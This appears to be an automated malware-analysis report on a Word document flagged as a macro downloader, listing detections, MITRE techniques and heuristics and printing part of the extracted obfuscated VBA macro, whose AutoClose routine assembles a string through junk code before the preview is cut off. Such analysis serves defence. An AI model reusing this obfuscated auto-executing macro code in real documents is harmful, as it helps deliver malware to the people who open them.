MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoClose subroutine, which is a common technique for executing malicious code upon document opening. Heuristics indicate the use of GetObject, suggesting the macro likely downloads and executes a second-stage payload. The ClamAV detection name 'Doc.Downloader.Valyria-6595163-0' further supports this analysis.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 88612 bytes |
SHA-256: 39ae170ebf6e421095e22ab8f26fbd386ba968db65ee1fd5c6be4a453d551e58 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub DlOSeGyQuHYlYCoroJiL()
cYnOvAHeCATI = 97631
JIGaVErUpoPOJExer = 85777
Dim sJejYxObiLIWEBESb
sJejYxObiLIWEBESb = Log(6)
sJejYxObiLIWEBESb = sJejYxObiLIWEBESb + Log(10)
Dim meYhOReSiPYdyWu
meYhOReSiPYdyWu = Rnd(107)
MikepuPOpOkaF = InStr("PYXIkEJAWadOb", "PYXIkEJAWadObPYXIkEJAWadOb")
BodOPOfOlIzUGaBU = 65340
If meYhOReSiPYdyWu > 54505 Then
meYhOReSiPYdyWu = Exp(7)
End If
kOGAXAWyBIBuCAcog = InStr("wivotnIXaruda", "wivotnIXarudawivotnIXaruda")
End Sub
Sub AutoClose()
wGyCyneLAxImiJuiyraDE = InStr("zOCuLESYJyhaRUtAbo", "zOCuLESYJyhaRUtAbozOCuLESYJyhaRUtAbo")
Dim tIziRebejuV
tIziRebejuV = Log(6)
tIziRebejuV = tIziRebejuV + Log(10)
Dim JAXoNepIpGaqASueWecA
JAXoNepIpGaqASueWecA = Log(9)
JAXoNepIpGaqASueWecA = JAXoNepIpGaqASueWecA + Log(12)
On Error Resume Next
Dim DyguSASiaheHafU
For DyguSASiaheHafU = 5 To 11
Dim SimEfuSyhiGY
SimEfuSyhiGY = Fix(54506)
Next
iEmuBEryzYJyQo = InStr("LOryKOiahoNusCABUQOaUq", "LOryKOiahoNusCABUQOaUqLOryKOiahoNusCABUQOaUq")
Dim WoXyqiQIJuCazoR
For WoXyqiQIJuCazoR = 1 To 12
Dim jMUlEqIsoVeFAzEpO
jMUlEqIsoVeFAzEpO = Fix(17868)
Next
zonYzeCOPENVABuvav = Val("48168.2") & "nuaiQaGumuKulUx"
Debug.Print "SuDxABYwiGeZiaY"
Dim HQEixaXNONOGyqYTE
For HQEixaXNONOGyqYTE = 2 To 13
Dim kyGaaibASDetKaRon
kyGaaibASDetKaRon = Fix(94908)
Next
Dim GLYxAfOiMaVUd
GLYxAfOiMaVUd = Log(9)
GLYxAfOiMaVUd = GLYxAfOiMaVUd + Log(10)
hocAIMAmuDuGIq = 44641
TiduJyQESeHYXs = ""
Dim VYhuWAkYWudAq
VYhuWAkYWudAq = Log(2)
VYhuWAkYWudAq = VYhuWAkYWudAq + Log(13)
sukiWIniQOc = 33013
NYfYZoCaPyZOcYXalAtYsei = 14162
zkOhEGadoTiJaxyTeFipoQY = 99530
jajyKIqydEzXaSCENMI = InStr("iuaUPAviFpuFOWa", "iuaUPAviFpuFOWaiuaUPAviFpuFOWa")
VUTUbOJiHucYbAwEDABAaz = InStr("NyurOwUBIISEiOtAXIkwy", "NyurOwUBIISEiOtAXIkwyNyurOwUBIISEiOtAXIkwy")
Debug.Print "QyQyqURAmIsEsO"
iYtsUGEwOwIHuPenYsovEVE = InStr("XAfUWUXovywinif", "XAfUWUXovywinifXAfUWUXovywinif")
Dim OJUtavEruSIKeFA
OJUtavEruSIKeFA = Rnd(132)
If OJUtavEruSIKeFA > 32865 Then
OJUtavEruSIKeFA = Exp(2)
End If
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((165 + 330) = 495, "s", "e")
Debug.Print "ROBucytYReZirYF"
piKUCoCyhaSYxeyPIQiFu = 44799
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((303 + 606) = 909, "c", "KO0K")
Debug.Print "ZEKlyvzir"
sjYXaloGyHeWVUcOTYq = Val("12011.8") & "vUrIhOgJatyDY"
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((223 + 446) = 669, "r", "MkEU")
Dim juVeSidudeJYlY
juVeSidudeJYlY = Rnd(102)
If juVeSidudeJYlY > 10619 Then
juVeSidudeJYlY = Exp(2)
End If
Debug.Print "bAtOKEcuwYjuMOpYpu"
XutubiIJUNihanuZ = Val("35444.5") & "zAhIzywOxyNyNaSaqa"
Dim VYruSIWuPKdudpezu
VYruSIWuPKdudpezu = Rnd(126)
If VYruSIWuPKdudpezu > 54634 Then
VYruSIWuPKdudpezu = Exp(6)
End If
Debug.Print "BodaaowarOXEwupg"
rIzedEjoLAtEcUDys = Val("41567.3") & "QecExYwiFeKEVIXtRilA"
FYNoTubigYaIHEZ = Val("15642.10") & "iEHIVaPApaWAWfOHahU"
ZEVLiRIxyhaiYSECUkAn = 63633
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((77 + 154) = 231, "i", "l")
FytYkaxyCeJTZugu = 65881
Dim NUdHuGOgesI
NUdHuGOgesI = Log(4)
NUdHuGOgesI = NUdHuGOgesI + Log(13)
dEPyRUxUiyCehihUgoSIgI = 55707
Dim bOcUtagqREbi
lAiuiaBYMAqYSafiPApo = 83638
bOcUtagqREbi = Log(6)
bOcUtagqREbi = bOcUtagqREbi + Log(12)
QePOKiwOQodiVecI = 35616
Dim vJIZyzUPOGxy
vJIZyzUPOGxy = Rnd(1010)
If vJIZyzUPOGxy > 36436 Then
vJIZyzUPOGxy = Exp(10)
End If
TiduJyQESeHYXs = TiduJyQESeHYXs + IIf((83 + 166) = 249, "p", "AI")
FOQEnEMyHyladuay = 62758
Dim tImIDepaJekadynoBULi
tImIDepaJekadynoBULi = Log(5)
tImIDepaJekadynoBULi = tImIDepaJekadynoBULi + Log(13)
Debug.Print "upOlgOFyZVEkyWo"
Debug.Print "kUtOpEMUTogAJiZ"
Dim FUFEaIxyyDaweZeZi
FUFEaIxyyDaweZeZi = Log(3)
FUFEaIxyyDaweZeZi = FUFEaIxyyDaweZeZi + Log(11)
TiduJyQESeHYXs = TiduJyQESe
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.